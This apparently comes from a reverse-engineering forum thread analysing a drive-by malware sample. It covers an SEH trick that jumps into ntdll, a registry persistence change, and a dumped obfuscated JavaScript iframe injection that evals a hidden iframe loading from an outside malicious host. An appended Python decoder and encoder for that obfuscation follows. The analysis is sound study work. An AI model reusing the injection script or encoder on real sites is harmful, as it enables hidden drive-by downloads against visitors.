Quote:
[Originally Posted by evaluator]
Kayaker, you will click on logo_hearts! so niiiiiiiceee..
Aaaahh, how sweet..
Youandme.exe. Keeps changing its name. Looks like the fake Obama site has disappeared too.
OK, I've got one for you Eval-Unpucks-In-Sleep-uator.
I've never seen this before either. A funky bit of code which manipulates offsets and memory addresses to directly jump to a CALL ECX instruction in ntdll. The value of ECX is set to an address in the 40xxxx range.
At the start of the malware an SEH is set (at 4010F9) and an invalid instruction is run which triggers the SEH. In the SEH you quickly reach the instruction:
Code:
:00401146 FF E0 jmp eax
EAX at this point has been adjusted to be 7C9037BD, and ECX is 401888.
Therefore the JMP EAX directly calls the following instruction in ntdll, with the CALL ECX offset being 401888:
Code:
:u eax (Softice)
:7C9037BD FFD1 CALL ECX ; 401888
:7C9037BF 648B2500000000 MOV ESP,FS:[00000000]
:7C9037C6 648F0500000000 POP DWORD PTR FS:[00000000]
:7C9037CD 8BE5 MOV ESP,EBP
:7C9037CF 5D POP EBP
:7C9037D0 C21400 RET 0014
That CALL ECX is part of the larger ntdll function ExecuteHandler2:
Code:
:7C903799 ExecuteHandler2@20 proc near ; CODE XREF: ExecuteHandler@20+1F
:7C903799
:7C903799 arg_0 = dword ptr 8
:7C903799 arg_4 = dword ptr 0Ch
:7C903799 arg_8 = dword ptr 10h
:7C903799 arg_C = dword ptr 14h
:7C903799 arg_10 = dword ptr 18h
:7C903799
:7C903799 push ebp
:7C90379A mov ebp, esp
:7C90379C push [ebp+arg_4]
:7C90379F push edx
:7C9037A0 push large dword ptr fs:0
:7C9037A7 mov large fs:0, esp
:7C9037AE push [ebp+arg_C]
:7C9037B1 push [ebp+arg_8]
:7C9037B4 push [ebp+arg_4]
:7C9037B7 push [ebp+arg_0]
:7C9037BA mov ecx, [ebp+arg_10]
:7C9037BD call ecx
:7C9037BF mov esp, large fs:0
:7C9037C6 pop large dword ptr fs:0
:7C9037CD mov esp, ebp
:7C9037CF pop ebp
:7C9037D0 retn 14h
:7C9037D0 ExecuteHandler2@20 endp
Sure enough, this works. Even though the execution path goes from 401146 to the middle of an ntdll function (which immediately calls to 401888), the ntdll function does eventually return, with all the correct stack, back into 40xxxx, and things continue on their merry way.
Here's the story behind the malware. I was browsing around with Opera and hit on an SQL-injected website which had an Iframe exploit embedded in it.
Suddenly ZoneAlarm warned me of some exe wanting to run within svchost.exe, and do I want to allow it? Duh. No. Turns out it had already modified my registry, but I was able to catch everything it had done before there was any permanent damage.
The exe file runs from "C:\Documents and Settings\MYOB\Local Settings\Temp\wJQs.exe" and copies itself to %windir%/digeste.dll.
The exe and dll file are identical except for the PE.Characteristics byte.
It modifies the key (the first 4 entries in the list are OK):
Code:
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SecurityProviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digeste.dll"
That's it. Search around for "digeste.dll" for further info.
To debug the Iframe javascript I dumped it (from the source of the site page I had browsed to) into a blank html file. I then added a window.alert popup box command to display the decoded Iframe, as well as a document.writeln command to display the Math.random result.
I know there are plugins and such to decode JS, but this direct method was just as easy. There were actually 2 JS instances, both almost identical, so I only include one.
Here is the Iframe exploit. If you wish to run it, it will simply display a message box with the decoded Iframe, then the random number in the html page. And of course it will attempt to connect to http://7speed.info; I don't believe the site exists any longer, but do disconnect from the net if you like.
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<script language=JavaScript>
function uawebnb25(z)
{
var c=z.length;
var m=1024;
var i,s,h,b=0;
var w=0,x=0;
// d: 6-bit symbol table indexed by (charCode - 48); the 0 entries map punctuation and 'z' to symbol 0
var d=Array(63,49,23,17,58,10,32,61,12,50,0,0,0,0,0,0,29,35,39,56,27,14,36,47,55,53,54,38,57,20,7,18,37,60,6,13,9,45,40,5,52,11,34,0,0,0,0,28,0,26,15,33,41,30,44,24,42,25,3,2,43,4,51,21,46,1,16,48,62,59,22,8,31,19,0);
for(s=Math.ceil(c/m); s>0; s--)
{
h='';
for(i=Math.min(c,m); i>0; i--,c--)
{
{
// pack each 6-bit symbol into x little-endian; every 4 symbols yield 3 bytes, each XORed with 231 (0xE7)
x|=(d[z.charCodeAt(b++)-48])<<w;
if(w)
{
h+=String.fromCharCode(231^x&255);
x>>=8;
w-=2
}else{
w=6
}
}
}
// START DEBUGGING
//document.writeln("h = " + h + "<br>");
// h = window.status='Done';document.write('')
window.alert(h);
// window.status='Done';document.write('<iframe name=356159
// src="http://7speed.info/t/?'+Math.round(Math.random()*29463)+'356159'+'"
// width=427 height=69 style="display:none"></iframe>')
var x;
x = Math.round(Math.random()*29463)+'356159';
document.writeln("x = " + x + "<br>");
// x = 10906356159; x = 677356159, etc.
// END DEBUGGING
eval(h);
}
}
uawebnb25('r4gZjZwFTyLFREdFMhSsAZgZkk8HjZwcOhV6TEi9rvdAy5CnzGUAqvdc55C1TaVZkhSIONUIOu71MvTca2QAyELP@A89ryLPk5C6TugZqZw9yZ8JznfhRELAT2TZOKC6blhcytg9oagZjZVZbu_nou7X3yUn8j8IONUIOuSs8j_1NjdAjELAab@IrxQAk4w6bEdJ3u71MEdBY5VJWbVAMeLZR4iHTZgZkv_JDAfAqvdc55gJzu8')
</script>
</body>
</html>
The attachment contains the exe, dll and the above html file renamed as *.txt
Password: malware
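The uawebnb25() decoder from the html above, reimplemented in Python as an added example (not code from the post or from the malware), together with the inverse encoder so the scheme can be exercised on constructed text. Only the table d[] and the XOR constant 231 are taken from the script; the function names, the choice of 'z' for symbol 0 and the sample text are this example's own assumptions.

```python
# Added example (not the post's own code): a Python re-implementation of the
# uawebnb25() decoder in the HTML above, plus the inverse encoder. Table d[]
# and the XOR key are copied from the script; names and sample text are mine.

# d[] from the script: index = charCode - 48, value = 6-bit symbol.
D = [63, 49, 23, 17, 58, 10, 32, 61, 12, 50, 0, 0, 0, 0, 0, 0, 29,
     35, 39, 56, 27, 14, 36, 47, 55, 53, 54, 38, 57, 20, 7, 18, 37,
     60, 6, 13, 9, 45, 40, 5, 52, 11, 34, 0, 0, 0, 0, 28, 0,
     26, 15, 33, 41, 30, 44, 24, 42, 25, 3, 2, 43, 4, 51, 21, 46,
     1, 16, 48, 62, 59, 22, 8, 31, 19, 0]
XOR_KEY = 231  # the script's "231^x&255": each output byte is XORed with 0xE7


def decode(z: str) -> str:
    """Mirror the JS loop: 6-bit symbols packed little-endian, 4 chars -> 3 bytes."""
    # The JS turns out-of-table characters into 0 (undefined << w); raise instead
    # so a corrupted sample (e.g. forum-inserted spaces) is noticed.
    out, x, w = [], 0, 0
    for ch in z:
        idx = ord(ch) - 48
        if not 0 <= idx < len(D):
            raise ValueError(f"{ch!r} is outside the decoder alphabet")
        x |= D[idx] << w
        if w:                      # w cycles 0 -> 6 -> 4 -> 2 -> 0
            out.append(chr(XOR_KEY ^ (x & 255)))
            x >>= 8
            w -= 2
        else:
            w = 6
    return "".join(out)


# Inverse table: symbol -> character. Symbol 0 fills several slots
# (':'..'?', '['..'^', '`', 'z'); 'z' is used here (assumption), any of them decodes.
INV = {v: chr(48 + i) for i, v in enumerate(D)}
INV[0] = "z"


def encode(s: str) -> str:
    """Inverse of decode(): XOR each byte, pack 3 bytes per 24-bit little-endian group."""
    data = [XOR_KEY ^ ord(c) for c in s]
    if any(b > 255 for b in data):
        raise ValueError("only Latin-1 text can be encoded")
    chars = []
    for i in range(0, len(data), 3):
        grp = data[i:i + 3]
        n = sum(b << (8 * k) for k, b in enumerate(grp))
        for k in range(len(grp) + 1):   # 1 byte -> 2 symbols, 2 -> 3, 3 -> 4
            chars.append(INV[(n >> (6 * k)) & 63])
    return "".join(chars)
```

Feeding decode() the script's own argument string reproduces the text the page shows in the comments; the first four symbols 'r4gZ' alone decode to "win".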